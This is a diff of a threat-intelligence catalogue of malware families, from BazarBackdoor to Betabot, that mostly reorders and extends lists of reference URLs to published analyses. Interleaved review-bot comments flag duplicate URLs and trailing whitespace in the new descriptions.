+ "https://intel471.com/blog/malvertising-surges-to-distribute-malware",
+ "https://www.mandiant.com/resources/seo-poisoning-batloader-atera"
 ],
 "synonyms": [],
 "type": []
@@ -14773,134 +15467,135 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
- "https://isc.sans.edu/diary/27308",
- "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
- "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
- "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
- "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
- "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
- "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
- "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
- "https://www.scythe.io/library/threatthursday-ryuk",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
 "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
 "https://experience.mandiant.com/trending-evil/p/1",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://abnormalsecurity.com/blog/bazarloader-contact-form",
- "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
- "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
- "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://twitter.com/Unit42_Intel/status/1458113934024757256",
+ "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
+ "https://intel471.com/blog/conti-leaks-ransomware-development",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
+ "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/",
+ "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://fr3d.hk/blog/campo-loader-simple-but-effective",
+ "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/",
+ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
+ "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://malwarebookreports.com/a-look-back-at-bazarloaders-dga/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
+ "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration",
+ "https://forensicitguy.github.io/bazariso-analysis-advpack/",
+ "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
+ "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
+ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
 "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://unit42.paloaltonetworks.com/bazarloader-malware/",
- "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
- "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://www.youtube.com/watch?v=pIXl79IPkLI",
- "https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
- "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/",
- "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/",
- "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/",
- "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
- "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
- "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
- "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/",
- "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
+ "https://isc.sans.edu/diary/27308",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti",
+ "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
+ "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
+ "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
 "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://intel471.com/blog/conti-leaks-ransomware-development",
- "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
- "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
- "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.scythe.io/library/threatthursday-ryuk",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
 "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
- "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
+ "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
+ "https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
+ "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html",
+ "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
 "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
 "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
- "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
- "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
- "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/",
- "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
 "https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/",
- "https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
- "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
- "https://fr3d.hk/blog/campo-loader-simple-but-effective",
- "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://forensicitguy.github.io/bazariso-analysis-advpack/",
- "https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
+ "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware",
 "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d",
+ "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
+ "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
 "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
- "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
- "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/"
+ "https://abnormalsecurity.com/blog/bazarloader-contact-form",
+ "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/",
+ "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
+ "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/"
 ],
 "synonyms": [
 "BEERBOT",
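Review bot: The rebuilt BazarBackdoor refs array still lists the same article more than once under trivially different URLs: `https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti` with and without a trailing slash, the Microsoft 2022/05/09 ransomware-as-a-service post with and without a trailing slash, the 2021/07/29 bazacall post under both `/security/blog/` and `/en-us/security/blog/`, and the Group-IB PDF both directly on cisoclub.ru and via web.archive.org. None of these pairs is introduced by this commit, but since the whole list is rewritten here anyway, normalising URLs (strip the trailing slash, drop the `en-us` locale segment) before de-duplicating would remove the noise; the archive copy is worth keeping deliberately as a fallback for the live link. The same near-duplicate pattern appears in the Biodata hunk further down, where one write-up is listed under both `ti.qianxin.com` and `ti.360.net`.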
@@ -14919,13 +15614,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://twitter.com/James_inthe_box/status/1357009652857196546",
 "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176",
- "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware"
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
+ "https://twitter.com/James_inthe_box/status/1357009652857196546"
 ],
 "synonyms": [
 "NimzaLoader"
@@ -14940,11 +15635,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat",
+ "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae",
+ "https://www.youtube.com/watch?v=uakw2HMGZ-I",
 "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/",
- "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
 "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb",
- "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
- "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae"
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html"
 ],
 "synonyms": [],
 "type": []
@@ -14957,6 +15653,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbtok",
+ "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/",
 "https://blog.360totalsecurity.com/en/360-file-less-attack-protection-intercepts-the-banker-trojan-bbtok-active-in-mexico/"
 ],
 "synonyms": [],
@@ -14966,7 +15663,7 @@
 "value": "BBtok"
 },
 {
- "description": "",
+ "description": "According to Symantec, Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy",
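Review bot: The new Beapy description in the `@@ -14966` hunk ends with a trailing space inside the string value (`across networks. "`), and the new BianLian description in the `@@ -15170` hunk ends the same way (`encrypted file. "`). Trailing whitespace inside a JSON string survives every parse/serialise round-trip, so every consumer that renders or compares descriptions will carry it; it should be stripped at import time rather than left for downstream tooling. If the descriptions are pulled from an upstream source by a script, a `.strip()` on the text before serialisation would cover both cases.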
@@ -14983,10 +15680,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop",
- "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
- "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
 "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
- "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/",
+ "https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745",
+ "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -14999,11 +15697,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep",
- "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html",
 "https://blog.talosintelligence.com/bedep-actor/",
+ "https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html",
+ "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html",
 "http://malware-traffic-analysis.net/2016/05/09/index.html",
- "https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/",
- "https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html"
+ "https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/"
 ],
 "synonyms": [],
 "type": []
@@ -15081,8 +15779,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos",
- "https://securitykitten.github.io/2015/07/14/bernhardpos.html",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-07-14-bernhardpos.md"
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-07-14-bernhardpos.md",
+ "https://securitykitten.github.io/2015/07/14/bernhardpos.html"
 ],
 "synonyms": [],
 "type": []
@@ -15104,22 +15802,22 @@
 "value": "BestKorea"
 },
 {
- "description": "Cybereason concludes that Betabot is a sophisticated infostealer malware that’s evolved significantly since it first appeared in late 2012. The malware began as a banking Trojan and is now packed with features that allow its operators to practically take over a victim’s machine and steal sensitive information.",
